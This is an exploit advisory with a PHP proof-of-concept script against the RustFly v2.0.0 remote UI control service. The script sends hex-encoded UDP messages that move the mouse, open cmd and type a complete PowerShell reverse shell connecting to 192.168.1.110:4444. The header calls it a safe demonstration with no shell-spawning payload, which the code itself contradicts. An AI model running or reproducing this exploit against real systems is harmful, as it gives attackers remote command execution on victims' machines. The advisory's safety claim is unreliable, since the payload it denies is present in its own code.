=============================================================================================================================================
| # Title     : RustFly v2.0.0 - Event Manipulation                                                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
| # Vendor    : https://bixat.dev/products/rustfly                                                                                          |
=============================================================================================================================================

[+] Summary    : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote
                 system-level operations. Improper sanitization allows command-level injection.

Steps To Reproduce:
-------------------
1) Configure IP and port of RustFly target.
2) Run this PHP PoC sender script.
3) Observe behavior change / message processing by RustFly.

=========================================================
PoC Impact:
-----------
* Proof of input injection capability
* Demonstrates command-carrier transport
* No shell-spawning payloads included (safe demonstration)

=========================================================
Instructions:
-------------
Save file as:
    poc.php

Run:
    php poc.php

<?php
$target_ip = "192.168.1.107";
$target_port = 5005;

$messages = [
    "6D6F76653A2D35352C31303530",  // move:-55,1050
    "646F75626C655F636C69636B",     // double_click
    "746578743A636D64",             // text:cmd
    "6B65793A656E746572",           // key:enter
    // Warning: This is a PowerShell command to create a reverse shell - potentially harmful use
    "746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22",
    "6B65793A656E746572",           // key:enter
];

$dangerous_powershell = hex2bin($messages[4]);
echo "=== Warning: Analyzing Dangerous Content ===\n";
echo "The PowerShell command encoded in hex is:\n";
echo $dangerous_powershell . "\n\n";

$decoded_ps = "powershell -nop -c \"\$c=New-Object System.Net.Sockets.TCPClient('192.168.1.110',4444);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){;\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=iex \$d 2>&1;\$s.Write((New-Object -TypeName System.Text.ASCIIEncoding).GetBytes(\$r + 'PS > '),0,(\$r + 'PS > ').Length)}\"";

echo "=== Security Warning ===\n";
echo "This code contains a dangerous PowerShell command:\n";
echo "--------------------------------------------------\n";
echo $decoded_ps . "\n";
echo "--------------------------------------------------\n\n";
echo "This command does:\n";
echo "1. Creates TCP connection to 192.168.1.110 on port 4444\n";
echo "2. Establishes a reverse shell (backdoor connection)\n";
echo "3. Executes any commands sent by the attacker\n";
echo "4. Returns results to the attacker\n\n";

echo "Do you want to continue? (yes/no): ";
$handle = fopen("php://stdin", "r");
$line = fgets($handle);
fclose($handle);

if(trim(strtolower($line)) != 'yes') {
    echo "Operation cancelled.\n";
    exit(0);
}

echo "Continuing...\n\n";

$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if ($sock === false) {
    echo "[-] Failed to create socket: " . socket_strerror(socket_last_error()) . "\n";
    exit(1);
}

if (!socket_bind($sock, "0.0.0.0", 0)) {
    echo "[-] Failed to bind socket: " . socket_strerror(socket_last_error()) . "\n";
    socket_close($sock);
    exit(1);
}

socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 5, "usec" => 0));

try {
    foreach ($messages as $index => $msg) {

        $binary_msg = hex2bin($msg);
        if ($binary_msg === false) {
            echo "[-] Invalid hex string: $msg\n";
            continue;
        }
        $sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);
        
        if ($sent === false) {
            echo "[-] Failed to send data: " . socket_strerror(socket_last_error()) . "\n";
        } else {

            $display_msg = preg_replace('/[^\x20-\x7E]/', '', $binary_msg);
            echo "[+] Message " . ($index + 1) . " sent: $display_msg\n";

            if ($index == 4) {
                echo " Warning: Malicious PowerShell command sent!\n";
            }
        }
        
        sleep(1);
    }
    
    echo "\n[+] All messages sent successfully.\n";
    echo " Warning: If executed, the target machine will connect to 192.168.1.110:4444\n";
    
} catch (Exception $e) {
    echo "[-] Exception: " . $e->getMessage() . "\n";
}

finally {
    socket_close($sock);
    echo "[*] Socket closed.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================